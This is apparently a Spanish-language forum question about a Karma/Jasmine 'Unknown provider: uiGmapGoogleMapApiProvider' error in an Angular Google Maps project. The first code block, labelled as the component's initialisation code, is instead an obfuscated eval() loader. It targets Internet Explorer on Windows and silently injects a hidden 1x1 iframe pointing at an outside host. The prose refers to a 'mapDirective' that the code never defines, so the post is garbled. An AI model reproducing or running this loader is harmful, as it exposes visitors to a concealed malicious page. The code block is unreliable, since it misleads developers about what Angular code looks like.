<p>Para un proyecto web en el que estoy participando usamos el componente <a href="http://angular-ui.github.io/angular-google-maps" rel="nofollow">Angular Google Maps</a>. Este es el código <code>JavaScript</code> que hace referencia al componente y lo inicializa:</p>

<pre><code><sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript>
</code></pre>

<p>donde <code>mapDirective</code> define un elemento HTML que contiene el componente de Google Maps.</p>

<p>Esto está funcionando como se espera. El problema es que cuando ejecuto un simple test usando <code>Jasmine</code> con <code>Karma</code>, obtengo el error <code>Unknown provider: uiGmapGoogleMapApiProvider</code>. Por alguna razón no está siendo capaz de encontrar el proveedor.</p>

<p>He intentado crear un <code>mock</code> para forzar la creación de un proveedor con ese nombre, pero no ha funcionado:</p>

<pre><code>angular.module('uiGmapgoogle-maps', [])
    .value('uiGmapGoogleMapApiProvider', {
        configure: function() {}
    });
</code></pre>

<p>¿Qué podría estar pasando aquí?</p>
